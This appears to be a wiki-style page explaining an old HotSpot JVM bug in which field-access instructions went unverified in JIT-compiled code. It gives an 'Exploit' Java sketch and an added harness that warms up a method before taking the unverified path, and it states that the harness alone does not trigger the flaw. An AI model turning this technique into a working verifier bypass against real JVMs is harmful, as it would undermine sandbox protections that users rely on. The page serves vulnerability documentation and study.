Description

A bug in [[HotSpot]]'s bytecode verifier: verification of the field access instructions (GETSTATIC, PUTSTATIC, GETFIELD, PUTFIELD) was deferred until the instruction was first executed, so the JIT could compile a method containing field accesses that had never been verified and then run that compiled code with the accesses still unchecked.

Exploit

See the full description here.

```java
class Myclass {
    int member;

    void dothing(boolean cont) {
        // Early return: on this path no field access instruction executes,
        // so none of them is verified.
        if (!cont) {
            return;
        }
        member += 2; // requires two accesses to the same member
        member += 1;
    }
}
```
  • Verification of the field access instructions is deferred until they are first executed.
  • Calling dothing(false) many times gets the method JIT compiled, but because the early return means member is never touched, the two access instructions are never verified.
  • The next call, dothing(true), runs the JIT compiled version with those accesses still unverified.
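An added driver (not code from the original page) that exercises the sequence the bullets describe: warm the method up on the early-return path until HotSpot compiles it, then take the field-access path in the compiled code for the first time. The Harness class name, the warm-up count, and the use of -XX:+PrintCompilation to confirm compilation are assumptions. Note that javac only emits well-formed field accesses, so this driver reproduces the warm-up-then-diverge sequence but does not by itself exercise the bug; an actual trigger needs a GETFIELD/PUTFIELD the verifier would have rejected, which has to be assembled by hand.

```java
// Added harness, not part of the original page. Drives Myclass.dothing through
// the warm-up-then-diverge sequence described above.
public class Harness {
    static class Myclass {
        int member;

        void dothing(boolean cont) {
            // Early return: no field access executes on this path.
            if (!cont) {
                return;
            }
            member += 2; // two accesses to the same field
            member += 1;
        }
    }

    // Step 1: take the early-return path often enough for the JIT to compile
    // dothing(). The count is an assumption; HotSpot's default tiered
    // thresholds are in the low thousands of invocations, so this is ample.
    static void warmUp(Myclass m, int iterations) {
        for (int i = 0; i < iterations; i++) {
            m.dothing(false);
        }
    }

    public static void main(String[] args) {
        Myclass m = new Myclass();
        warmUp(m, 100_000);
        // Step 2: first execution of the field accesses, now inside the
        // compiled version of dothing().
        m.dothing(true);
        // With javac's well-formed bytecode this prints 3; the point of the
        // sequence is only that the accesses ran unverified in compiled code.
        System.out.println("member = " + m.member);
    }
}
```

Run it as `java -XX:+PrintCompilation Harness` and check that a line naming `Harness$Myclass::dothing` appears in the compilation log before the final call; if it does not, raise the warm-up count or lower the threshold with -XX:CompileThreshold, since the exact trigger point depends on the JVM build and its tiered-compilation settings.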